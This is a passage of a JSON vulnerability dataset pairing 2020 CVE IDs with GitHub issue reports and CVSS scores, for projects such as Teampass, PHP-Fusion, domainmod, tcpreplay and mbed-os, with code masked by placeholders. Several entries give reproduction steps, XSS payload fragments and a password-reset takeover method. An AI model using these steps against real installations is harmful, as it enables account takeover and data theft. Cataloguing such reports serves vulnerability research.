  47146. "description": "Some Teampass files are available without authentication. Many of the files included in Teampass are available without authentication to anyone who can interact with the web server. While this may not be an issue for some of the images or Javascript files, it is an issue for the user uploaded files that are available without authentication. These include: upload dir all file uploads (encrypted) avatars dir all profile pictures backups dir (presumably) Teampass backups Note that accessing the scripts here can also trigger the backups to run files dir PDFs generated via admin functions are saved here many files under the \u201cincludes\u201d directory miscellaneous files under web root FILETAG , APITAG Dockerfile, etc) Additionally, it does not appear that Teampass checks to see if directory listing is turned on on the web server. This feature is frequently on by default and when left on, makes it easy to discover the hashed file names that are sometimes used. Steps to reproduce Use a simple curl request to retrieve one of the files I noted above. EG: APITAG Steps to fix Review what files and directories should be exposed without authentication Ensure that only authenticated users can attempt to access files in sensitive directories (upload, backups, files, etc) Ensure that only authorized users can actually retrieve files in sensitive directories Server configuration Teampass version NUMBERTAG",
  47147. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47148. "severity": "HIGH",
  47149. "baseScore": 7.5,
  47150. "impactScore": 3.6,
  47151. "exploitabilityScore": 3.9
  47152. },
  47153. {
  47154. "CVE_ID": "CVE-2020-12479",
  47155. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2762",
  47156. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2762",
  47157. "Repo_new": "nilsteampassnet/teampass",
  47158. "Issue_Created_At": "2020-04-02T16:12:17Z",
  47159. "description": "PHP arbitrary file include. Teampass allows users to choose from several different languages. The user changes their language preference by sending a POST request to Teampass ( APITAG ) that contains the string of the language they choose (\u201cenglish\u201d, \u201cspanish\u201d, etc). This string provided by the user is not validated or sanitized in any way. After the string provided by the user is stored in the DB, it is eventually used in APITAG during login on line NUMBERTAG APITAG This allows any user to file_include any existing PHP file on disk. If a user could upload their own PHP file, then it could be combined with this bug to achieve code execution on the Teampass server. Steps to fix Validate the value from the APITAG parameter. The only permissible values should be a hard coded list of strings that exist in PATHTAG directory. In the case of a non valid value, Teampass should deny the language change and immediately stop processing the data in the APITAG parameter Server configuration Teampass version NUMBERTAG",
  47160. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  47161. "severity": "HIGH",
  47162. "baseScore": 8.8,
  47163. "impactScore": 5.9,
  47164. "exploitabilityScore": 2.8
  47165. },
  47166. {
  47167. "CVE_ID": "CVE-2020-12607",
  47168. "Issue_Url_old": "https://github.com/AntonKueltz/fastecdsa/issues/52",
  47169. "Issue_Url_new": "https://github.com/antonkueltz/fastecdsa/issues/52",
  47170. "Repo_new": "antonkueltz/fastecdsa",
  47171. "Issue_Created_At": "2020-04-13T15:05:16Z",
  47172. "description": "ECDSA verification fails for extreme value in k and s NUMBERTAG P NUMBERTAG SHA NUMBERTAG Hello, When verifying a ECDSA signature (P NUMBERTAG SHA NUMBERTAG with a extreme value in k and s NUMBERTAG the verification fails even if the signature is correct. It is possible to check this using the Google Wycheproof test NUMBERTAG URLTAG ERRORTAG I've added a APITAG using fast ecdsa and python cryptography (below). ERRORTAG Best regards, Antonio",
  47173. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  47174. "severity": "HIGH",
  47175. "baseScore": 7.5,
  47176. "impactScore": 3.6,
  47177. "exploitabilityScore": 3.9
  47178. },
  47179. {
  47180. "CVE_ID": "CVE-2020-12666",
  47181. "Issue_Url_old": "https://github.com/go-macaron/macaron/issues/198",
  47182. "Issue_Url_new": "https://github.com/go-macaron/macaron/issues/198",
  47183. "Repo_new": "go-macaron/macaron",
  47184. "Issue_Created_At": "2020-04-30T13:58:41Z",
  47185. "description": "vulnerablilitiy NUMBERTAG APITAG URLTAG \u9700\u8981\u5f00\u542f\u9759\u6001\u6587\u4ef6\u670d\u52a1 \u6f0f\u6d1e\u4ee3\u7801 CODETAG \u53ea\u8981\u4f7f\u7528\u4e86 APITAG \u6bd4\u5982\u8bbf\u95ee\uff1a FILETAG \u5373\u53ef\u8df3\u5230evoa.me APITAG \u5206\u6790\u4e00\u4e0b\uff0c\u4ee5 APITAG \u4e3a\u4f8b APITAG APITAG APITAG APITAG PATHTAG \u8fd4\u56de\u5934\u5bf9\u5e94\u7684location\u4e3a APITAG APITAG PATHTAG \u7f16\u7801\u4e3a APITAG APITAG \u4e3e\u4e2a\u4f8b\u5b50 \u6bd4\u5982\u5047\u5982\u7a0b\u5e8f\u91cc\u6709\u8fd9\u4e48\u4e00\u4e2a\u4ee3\u7801 ERRORTAG APITAG APITAG APITAG APITAG APITAG by the way, django\u66fe\u7ecf\u4e5f\u6709\u4e00\u4e2a\u5dee\u4e0d\u591a\u7684\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u770b\u770b\u8fd9\u7bc7\u6587\u7ae0\uff1a URLTAG \u4fee\u590d\u5efa\u8bae\uff1a \u5bf9\u91cd\u5b9a\u5411\u7684url\u8fdb\u884c\u5224\u65ad\uff0c\u4e0d\u5141\u8bb8//\u5f00\u5934 \u7531\u8877\u7684\u611f\u8c22\u60a8\u770b\u5b8c\u8fd9\u4e48\u957f\u4e00\u7bc7issue\u62a5\u544a",
  47186. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47187. "severity": "MEDIUM",
  47188. "baseScore": 6.1,
  47189. "impactScore": 2.7,
  47190. "exploitabilityScore": 2.8
  47191. },
  47192. {
  47193. "CVE_ID": "CVE-2020-12706",
  47194. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2306",
  47195. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2306",
  47196. "Repo_new": "php-fusion/PHP-Fusion",
  47197. "Issue_Created_At": "2020-04-09T07:56:22Z",
  47198. "description": "Multi Cross site scripting (XSS) vulnerabilities php fusion NUMBERTAG Describe the bug Cross site scripting (XSS) vulnerabilities in PHP Fusion NUMBERTAG allow remote attackers to inject arbitrary web script or HTML To Reproduce Steps to reproduce the behavior NUMBERTAG Login as member NUMBERTAG Go to 'Q&A or shoutbo NUMBERTAG Submit malicious content NUMBERTAG Login as admin and view Q&A or shout content NUMBERTAG SS trigger Expected behavior When admin view content, a pop up will be displayed Screenshots FILETAG Desktop (please complete the following information): OS: Windows NUMBERTAG Browser: Firefox or Chrome Version: Smartphone (please complete the following information): Device: [e.g. APITAG OS: [e.g. iOS NUMBERTAG Browser [e.g. stock browser, safari] Version [e.g NUMBERTAG Additional context POC at: URLTAG",
  47199. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47200. "severity": "MEDIUM",
  47201. "baseScore": 5.4,
  47202. "impactScore": 2.7,
  47203. "exploitabilityScore": 2.3
  47204. },
  47205. {
  47206. "CVE_ID": "CVE-2020-12708",
  47207. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2310",
  47208. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2310",
  47209. "Repo_new": "php-fusion/PHP-Fusion",
  47210. "Issue_Created_At": "2020-04-30T08:09:05Z",
  47211. "description": "Reflected XSS on FILETAG and FILETAG . Describe the bug Reflected cross site scripting (XSS) vulnerabilities in PHP Fusion NUMBERTAG allow remote attackers to inject arbitrary web script or HTML via FILETAG and FILETAG To Reproduce User authenticated or unauthenticated click to link bellow and script will be executed: URLTAG APITAG >alert('XSS') APITAG URLTAG APITAG >alert('XSS') APITAG Tested on OS: Windows NUMBERTAG Browser: Firefox and Chrome Please check it! Thanks",
  47212. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  47213. "severity": "MEDIUM",
  47214. "baseScore": 6.1,
  47215. "impactScore": 2.7,
  47216. "exploitabilityScore": 2.8
  47217. },
  47218. {
  47219. "CVE_ID": "CVE-2020-12718",
  47220. "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2309",
  47221. "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2309",
  47222. "Repo_new": "php-fusion/PHP-Fusion",
  47223. "Issue_Created_At": "2020-04-29T01:38:25Z",
  47224. "description": "Cross Site Scripting Vulnerability on \"preview comment\" feature in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a stored XSS vulnerability in the \"preview comment\" feature. This was can be bypassed by using HTML event handlers, such as \"ontoggle\". To Reproduce Log into the panel. Go to PATHTAG Click edit on comment Insert payload '> APITAG View the preview to trigger XSS. View the preview to get in request and such Store XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version of Browser NUMBERTAG",
  47225. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47226. "severity": "MEDIUM",
  47227. "baseScore": 5.4,
  47228. "impactScore": 2.7,
  47229. "exploitabilityScore": 2.3
  47230. },
  47231. {
  47232. "CVE_ID": "CVE-2020-12725",
  47233. "Issue_Url_old": "https://github.com/getredash/redash/issues/4869",
  47234. "Issue_Url_new": "https://github.com/getredash/redash/issues/4869",
  47235. "Repo_new": "getredash/redash",
  47236. "Issue_Created_At": "2020-05-07T10:53:13Z",
  47237. "description": "Vulnerability report: details TBA. Havoc Research has discovered a vulnerability in Redash and reported it to security APITAG This issue will be populated with details once the vendor has addressed it, or in NUMBERTAG days, whichever comes first. CVE number has been requested. Suggested CVSS NUMBERTAG ector: URLTAG NUMBERTAG Internal reference: HA NUMBERTAG C NUMBERTAG Thanks \ud83c\udf2a\ufe0f Havoc Research team",
  47238. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  47239. "severity": "HIGH",
  47240. "baseScore": 7.2,
  47241. "impactScore": 5.9,
  47242. "exploitabilityScore": 1.2
  47243. },
  47244. {
  47245. "CVE_ID": "CVE-2020-12735",
  47246. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/122",
  47247. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/122",
  47248. "Repo_new": "domainmod/domainmod",
  47249. "Issue_Created_At": "2020-05-02T05:10:09Z",
  47250. "description": "Authentication Bypass via FILETAG . Summary : FILETAG handles \u201cresetting\u201d/changing an existing user\u2019s password. The reset functionality uses PHP\u2019s APITAG to derive the new password for the user that is attempting to change their password. This method of using APITAG to create a temporary password is very deterministic and allows an attacker to invoke the reset password functionality and reliably determine what the new password is, thus allowing for an account takeover. File Affected : FILETAG Vulnerability Details NUMBERTAG Below is an overview of the logic used by FILETAG to change a user\u2019s password. FILETAG NUMBERTAG In red is the SQL statement is used to determine the existence of a user. APITAG APITAG APITAG APITAG APITAG A user\u2019s password is changed only if the above statement returns a non empty result set. As we can see, the above SQL statement results in a row being returned if either the username or the email address exists in the database. Hence, an attacker will able to invoke a change of password (in green) as long the attacker knows a valid username NUMBERTAG Once, the user\u2019s username (email ID) is validated, the application proceeds to change the password of the user (in green). A new/temporary password is created for the user by using the first NUMBERTAG characters of the MD5 hash of the current Unix timestamp. APITAG APITAG APITAG APITAG APITAG An SQL statement is then used to update the user with the new password NUMBERTAG The problem with the aforementioned logic is that It is very easy for an attacker to determine the new password as the result of the APITAG is very deterministic and not random. Hence, this vulnerability can be exploited to change the password of a user and then reliably determine the new password. The credentials can then be used to login to the application. APITAG APITAG As, admin is a default user on the application, this vulnerability can be used to change the admin password and consequently login to the application as the said admin user. Exploit: The following python script can be used to reset/change a user\u2019s password and subsequently determine the new password. CODETAG NUMBERTAG Successful login using APITAG FILETAG NUMBERTAG Resetting the password using the above exploit code NUMBERTAG Unsuccessful login using APITAG FILETAG NUMBERTAG Successful login using newly obtained credentials admin:e NUMBERTAG edd7b FILETAG Mitigation: One suggestion is to use a cryptographically secure random number as the seed to the APITAG instead of APITAG APITAG",
  47251. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  47252. "severity": "CRITICAL",
  47253. "baseScore": 9.8,
  47254. "impactScore": 5.9,
  47255. "exploitabilityScore": 3.9
  47256. },
  47257. {
  47258. "CVE_ID": "CVE-2020-12740",
  47259. "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/576",
  47260. "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/576",
  47261. "Repo_new": "appneta/tcpreplay",
  47262. "Issue_Created_At": "2020-05-08T15:35:39Z",
  47263. "description": "Heap overflow in APITAG Describe the bug A heap based buffer overflow was discovered in tcprewrite binary, during the get_c operation. The issue is being triggered in the function APITAG at common/get.c. To Reproduce Steps to reproduce the behavior NUMBERTAG Compile tcpreplay according to the default configuration NUMBERTAG execute command APITAG poc URLTAG can be found here. Expected behavior An attacker can exploit this vulnerability by submitting a malicious pcap that exploits this issue. This will result in a Denial of Service APITAG and potentially Information Exposure when the application attempts to process the file. Screenshots ASAN Reports ERRORTAG Debug ERRORTAG System (please complete the following information): OS version : Ubuntu NUMBERTAG Tcpreplay Version NUMBERTAG master branch",
  47264. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47265. "severity": "CRITICAL",
  47266. "baseScore": 9.1,
  47267. "impactScore": 5.2,
  47268. "exploitabilityScore": 3.9
  47269. },
  47270. {
  47271. "CVE_ID": "CVE-2020-12762",
  47272. "Issue_Url_old": "https://github.com/rsyslog/libfastjson/issues/161",
  47273. "Issue_Url_new": "https://github.com/rsyslog/libfastjson/issues/161",
  47274. "Repo_new": "rsyslog/libfastjson",
  47275. "Issue_Created_At": "2020-05-15T14:09:18Z",
  47276. "description": "Please check if affected by CVETAG . CVETAG was reported for json c, see URLTAG Please check if libfastjson is affected by a similar problem. At least it looks like that printbuf.c changes should be backported.",
  47277. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  47278. "severity": "HIGH",
  47279. "baseScore": 7.8,
  47280. "impactScore": 5.9,
  47281. "exploitabilityScore": 1.8
  47282. },
  47283. {
  47284. "CVE_ID": "CVE-2020-12767",
  47285. "Issue_Url_old": "https://github.com/libexif/libexif/issues/31",
  47286. "Issue_Url_new": "https://github.com/libexif/libexif/issues/31",
  47287. "Repo_new": "libexif/libexif",
  47288. "Issue_Created_At": "2020-02-18T01:59:09Z",
  47289. "description": "division by zero in libexif/exif entry.c. The problem of dividing by zero was found during the OSS Fuzz project test. Project: libexif Fuzzer: APITAG Fuzz target binary: exif_loader_fuzzer Platform Id: linux Type of test\uff1aundefined Command: python infra/helper.py build_fuzzers sanitizer undefined libexif Results of execution\uff1a ERRORTAG",
  47290. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  47291. "severity": "MEDIUM",
  47292. "baseScore": 5.5,
  47293. "impactScore": 3.6,
  47294. "exploitabilityScore": 1.8
  47295. },
  47296. {
  47297. "CVE_ID": "CVE-2020-12797",
  47298. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/5606",
  47299. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/5606",
  47300. "Repo_new": "hashicorp/consul",
  47301. "Issue_Created_At": "2019-04-04T14:35:02Z",
  47302. "description": "ACL is not updated on remote datacenters. Overview of the Issue After updating an acl on primary site, we've noticed that changes are not replicated to remote datacenters (even few after NUMBERTAG h). In this example, we've changed the policy to allow write in kv on path \"services data overrides\". Note: This does not apply to all ACLs. Changes on other ACLs are replicated, new ACLs are replicated. Here is the detail of this acl: Updated ACL: dc1 (ACL datacenter): CODETAG Other datacenters: dc2: CODETAG dc3: ERRORTAG Writing kv in path not replicated: dc1 (acl site) CODETAG others: ERRORTAG Reproduction Steps I don't think it is simple to reproduce as it only impact some ACL (undefined root cause). Consul info for both Client and Server APITAG APITAG ACL Datacenter Server info APITAG ERRORTAG APITAG APITAG APITAG datacenter Server info APITAG ERRORTAG APITAG Operating system and Environment details OS: APITAG Linux release NUMBERTAG APITAG APITAG APITAG Versions APITAG CODETAG APITAG Log Fragments There is no log related to ACL except this mention at startup: APITAG Questions How come dc3 is still in legacy mode? Any idea why we are unable to propagate changes on this acl?",
  47303. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  47304. "severity": "MEDIUM",
  47305. "baseScore": 5.3,
  47306. "impactScore": 1.4,
  47307. "exploitabilityScore": 3.9
  47308. },
  47309. {
  47310. "CVE_ID": "CVE-2020-12845",
  47311. "Issue_Url_old": "https://github.com/cherokee/webserver/issues/1242",
  47312. "Issue_Url_new": "https://github.com/cherokee/webserver/issues/1242",
  47313. "Repo_new": "cherokee/webserver",
  47314. "Issue_Created_At": "2020-07-25T11:07:45Z",
  47315. "description": "NULL pointer derefence during HTTP authentication. Cherokee Web Server NUMBERTAG to NUMBERTAG have a NULL pointer dereference which leads to a denial of service. Any server that has HTTP authentication (either basic or digest) enabled and paths that respond with the WWW Authenticate header, can be crashed by an unauthenticated and remote attacker by sending a malformed Authorization header to such paths. The following commands are used to generate HTTP requests that trigger the vulnerability APITAG APITAG does not allocate memory if the the size of the input string is less or equal to zero and return APITAG nonetheless. ERRORTAG APITAG and APITAG do not have any checks on the return value from APITAG and will later dereference an uninitialized pointer (read and write), at APITAG CODETAG and in a call to APITAG (illegal write at APITAG ) respectively CODETAG",
  47316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47317. "severity": "HIGH",
  47318. "baseScore": 7.5,
  47319. "impactScore": 3.6,
  47320. "exploitabilityScore": 3.9
  47321. },
  47322. {
  47323. "CVE_ID": "CVE-2020-12872",
  47324. "Issue_Url_old": "https://github.com/erlyaws/yaws/issues/402",
  47325. "Issue_Url_new": "https://github.com/erlyaws/yaws/issues/402",
  47326. "Repo_new": "erlyaws/yaws",
  47327. "Issue_Created_At": "2020-05-24T13:03:23Z",
  47328. "description": "CVETAG . While going trough some CVE feeds and track the information noticed the CVE NUMBERTAG CVETAG assignment for yaws, which is from the following report URLTAG Were you informed about this?",
  47329. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  47330. "severity": "MEDIUM",
  47331. "baseScore": 5.5,
  47332. "impactScore": 3.6,
  47333. "exploitabilityScore": 1.8
  47334. },
  47335. {
  47336. "CVE_ID": "CVE-2020-12882",
  47337. "Issue_Url_old": "https://github.com/Submitty/Submitty/issues/5266",
  47338. "Issue_Url_new": "https://github.com/submitty/submitty/issues/5266",
  47339. "Repo_new": "submitty/submitty",
  47340. "Issue_Created_At": "2020-04-19T19:46:42Z",
  47341. "description": "Security bug] Stored XSS Trigger for TA by user account. Describe the bug APITAG vulnerability can potentially enable any student to takeover the account of TA if they open the attachment as the cookie gets exposed._ A student logged in via username/password student:student has the ability to submit submissions for grading. This can be then viewed by TA from their account via ta:ta . When they click on the file for grading, stored xss gets triggered. Expected behavior .svg files must be stopped from getting uploaded by any student during submissions. To Reproduce Steps to reproduce the behavior NUMBERTAG As student login, via student:student NUMBERTAG Go here URLTAG (as e NUMBERTAG In the new submission upload the .svg file. The svg file can be created by saving as .svg Github doesn't allow attacing svg and neither its code so here is the [link URLTAG to create a sample malicious svg file NUMBERTAG Login as ta and open the same for grading. The XSS gets triggered alerting the cookies. Screenshots APITAG APITAG Additional context We may try to block .svg files from uploading and also try to drop the Content Type: image/svg+xml. Adding content disposition: attachment as mentioned here URLTAG may help for the mitigation.",
  47342. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  47343. "severity": "MEDIUM",
  47344. "baseScore": 5.4,
  47345. "impactScore": 2.7,
  47346. "exploitabilityScore": 2.3
  47347. },
  47348. {
  47349. "CVE_ID": "CVE-2020-12883",
  47350. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12925",
  47351. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12925",
  47352. "Repo_new": "armmbed/mbed-os",
  47353. "Issue_Created_At": "2020-05-05T20:59:22Z",
  47354. "description": "Out of range memory access in APITAG APITAG library parser. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with option delta lower than NUMBERTAG is parsed, the remaning message length is incorrectly calculated in the line: URLTAG The packet data pointer is not incremented prior to the remaining message length calculation and therefore it does not account for the option byte. This allows a malformed message with not option value following to pass through message length check in the line: URLTAG For short options length the remaining message length is unchanged after option lengh processing: URLTAG Allowing to pass throught final message length check: URLTAG In option processing code the packet data pointer is incremented beyond the input buffer boundary and passed for further processing, e.g. in: URLTAG The invalid pointer is then accessed by functions called from option processing code, e.g. in: URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG",
  47355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47356. "severity": "CRITICAL",
  47357. "baseScore": 9.1,
  47358. "impactScore": 5.2,
  47359. "exploitabilityScore": 3.9
  47360. },
  47361. {
  47362. "CVE_ID": "CVE-2020-12883",
  47363. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12927",
  47364. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12927",
  47365. "Repo_new": "armmbed/mbed-os",
  47366. "Issue_Created_At": "2020-05-05T21:04:21Z",
  47367. "description": "Out of range memory access in APITAG APITAG library parser option value length. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with option length equal to NUMBERTAG or NUMBERTAG is set with no extended option length following, access beyond the provided packet buffer is made due to insufficient message length checks: URLTAG Before option length processing the message left bytes is calculated including the option delta/option length byte: URLTAG In case of option length set to NUMBERTAG the extended delta length is accessed in the following line without prior check for buffer out of bound condition: URLTAG In case of option length set to NUMBERTAG the extended length bytes are accessed with insufficient out of boudnds condition checks. As the message_left variable includes the option length byte, the check will pass malformed frame if there is only one extended length byte following: URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG FILETAG",
  47368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47369. "severity": "CRITICAL",
  47370. "baseScore": 9.1,
  47371. "impactScore": 5.2,
  47372. "exploitabilityScore": 3.9
  47373. },
  47374. {
  47375. "CVE_ID": "CVE-2020-12883",
  47376. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12926",
  47377. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12926",
  47378. "Repo_new": "armmbed/mbed-os",
  47379. "Issue_Created_At": "2020-05-05T21:02:26Z",
  47380. "description": "Out of range memory access in APITAG APITAG library parser option number. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with option delta equal to NUMBERTAG or NUMBERTAG is parsed with no extended option delta following, access beyond the packet data buffer is made due to insufficient message length checks: URLTAG Before option number processing the message left bytes is calculated including the option delta/option length byte: URLTAG In case of option delta set to NUMBERTAG the extended delta byte is accessed in the following line without prior check for buffer out of bound index: URLTAG In case of option delta set to NUMBERTAG the extended delta bytes are accessed with insufficient index check. As the message_left variable includes the option delta byte, the check will pass malformed frame if there is only one extended delta byte following: URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG FILETAG",
  47381. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47382. "severity": "CRITICAL",
  47383. "baseScore": 9.1,
  47384. "impactScore": 5.2,
  47385. "exploitabilityScore": 3.9
  47386. },
  47387. {
  47388. "CVE_ID": "CVE-2020-12884",
  47389. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12928",
  47390. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12928",
  47391. "Repo_new": "armmbed/mbed-os",
  47392. "Issue_Created_At": "2020-05-05T21:05:47Z",
  47393. "description": "Out of range memory access in APITAG APITAG library parser APITAG Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet with malformed URI Query option is provided as input, the parser reads out of the provided input packet memory area. URLTAG The packet_data_pptr is accessed after being incremented by option_len without prior out of bound memory check. The temp_parsed_uri_query_ptr is validated for correct range, but the range valid for temp_parsed_uri_query_ptr is derived from the amount of allocated heap memory, not the input size. Therefore the check of temp_parsed_uri_query_ptr may be insufficient for safe access to the area pointed by packet_data_pptr. URLTAG Type: Integer Overflow or Wraparound Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG",
  47394. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47395. "severity": "CRITICAL",
  47396. "baseScore": 9.1,
  47397. "impactScore": 5.2,
  47398. "exploitabilityScore": 3.9
  47399. },
  47400. {
  47401. "CVE_ID": "CVE-2020-12885",
  47402. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12929",
  47403. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12929",
  47404. "Repo_new": "armmbed/mbed-os",
  47405. "Issue_Created_At": "2020-05-05T21:08:59Z",
  47406. "description": "Infinite loop in APITAG APITAG library parser. Description of defect References: URLTAG FILETAG File: FILETAG CODETAG Analysis: If a packet containing an option that is processed by the APITAG function and that declares a zero option length is encountered, the parser enters an infinite loop. Example entry point with zero length option_len: URLTAG Together with message_left equal to NUMBERTAG, this results in a computed required heap size of zero: URLTAG With a zero length heap allocation the function exits early without entering the main processing loop: URLTAG This leaves (*packet_data_pptr) unmodified, still pointing at the same option, so APITAG keeps processing the same option in an infinite loop. Type: Remote Denial Of Service Excessive resources usage (CPU time) System overload Result: The procedure loops infinitely Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG FILETAG",
  47407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  47408. "severity": "HIGH",
  47409. "baseScore": 7.5,
  47410. "impactScore": 3.6,
  47411. "exploitabilityScore": 3.9
  47412. },
  47413. {
  47414. "CVE_ID": "CVE-2020-12886",
  47415. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12948",
  47416. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12948",
  47417. "Repo_new": "armmbed/mbed-os",
  47418. "Issue_Created_At": "2020-05-08T18:10:34Z",
  47419. "description": "Out of range memory access in APITAG APITAG library parser token length not validated. Description of defect References: URLTAG FILETAG File: FILETAG Analysis: If a packet with declared token length larger than actually provided is parsed, read out of the provided input buffer boundaries may occur. Invalid memory access may occur in APITAG as there is no check to verify if the arguments are within input buffer boundaries: URLTAG Type: Out of bounds Read Result: Parsing data out of input bounds Possible crash due out of bound memory access Patch proposal: URLTAG Target(s) affected by this defect ? APITAG mbed coap library NUMBERTAG APITAG NUMBERTAG Toolchain(s) (name and version) displaying this defect ? N/A What version of Mbed os are you using (tag or sha) ? APITAG NUMBERTAG What version(s) of tools are you using. List all that apply (E.g. mbed cli) N/A How is this defect reproduced ? Parsing the provided input example input with APITAG function. CODETAG FILETAG",
  47420. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  47421. "severity": "CRITICAL",
  47422. "baseScore": 9.1,
  47423. "impactScore": 5.2,
  47424. "exploitabilityScore": 3.9
  47425. },
  47426. {
  47427. "CVE_ID": "CVE-2020-12887",
  47428. "Issue_Url_old": "https://github.com/ARMmbed/mbed-os/issues/12957",
  47429. "Issue_Url_new": "https://github.com/armmbed/mbed-os/issues/12957",
  47430. "Repo_new": "armmbed/mbed-os",
  47431. "Issue_Created_At": "2020-05-11T21:04:23Z",
